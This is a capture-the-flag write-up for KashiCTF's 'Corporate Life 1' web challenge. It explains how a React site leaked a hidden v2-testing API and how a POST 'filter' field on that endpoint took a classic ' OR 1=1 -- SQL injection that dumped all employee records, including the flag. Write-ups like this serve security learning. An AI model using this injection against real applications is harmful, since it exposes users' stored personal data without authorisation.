KashiCTF

Corporate Life 1 [137 pts]

Challenge Description

Points: 137

Solves: 144

react framework leaks hidden API, which contains OR SQL injection to retrieve all the users

We are presented with a webpage (without source code)

There isn’t much to do here. After observing the interactions with the server, there are numerous requests when fetching /.

The selected request comes with a response containing hidden endpoint at v2-testing

Fetching this endpoint we get the following page

Each tab sends new request with POST parameter field (note that this it the request for switching fields, not for name search, which is not vulnerable)

This parameter is vulnerable to SQLi, and we can get the flag with simple OR injection:

{
	"filter":"' OR 1=1 --"
}

which leaks a user with the flag KashiCTF{s4m3_old_c0rp0_l1f3_CVgrrmjz}:

{
"employee_name":"peter.johnson",
"request_detail":"Shitty job, I hate working here, I will leak all important information like KashiCTF{s4m3_old_c0rp0_l1f3_CVgrrmjz}",
"status":"denied",
"department":"Logistics",
"role":"Supply Chain Manager",
"email":"peter.johnson@corp.com"
},

Assist

Writeups

HTB

HTB

KashiCTF

Corporate Life 1 [137 pts]